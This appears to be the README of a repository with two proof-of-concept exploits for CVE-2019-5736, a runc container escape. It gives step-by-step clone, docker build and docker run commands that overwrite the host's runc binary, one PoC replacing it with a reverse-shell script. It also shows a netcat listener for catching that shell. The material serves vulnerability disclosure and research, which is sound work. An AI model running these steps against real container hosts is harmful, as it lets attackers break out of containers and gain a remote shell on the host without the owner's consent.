Two PoCs for CVE-2019-5736. See Twistlock Labs for an explanation of CVE-2019-5736 and the PoCs.
The malicious image PoC is heavily based on q3k’s PoC, so all credit goes to him.
Note that running the PoCs will overwrite the runc binary on the host. It is recommened that you create a copy of your runc binary (commonly at /usr/sbin/runc) before running one of the PoCs.
Clone the repository:
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736Overwrites runc with a simple program that prints a string.
Running the exec PoC:
$ cd RunC-CVE-2019-5736
$ docker build -t cve-2019-5736:exec_POC ./exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bashOverwrites runc with a simple reverse shell bash script that connects to localhost:2345.
Listen for the reverse shell:
$ nc -nvlp 2345From a different shell, run the malicious image PoC:
$ cd RunC-CVE-2019-5736
$ docker build -t cve-2019-5736:malicious_image_POC ./malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC